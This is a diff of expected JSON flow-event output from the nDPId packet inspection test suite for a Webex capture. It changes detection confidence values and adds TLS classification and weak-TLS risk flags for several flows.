00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
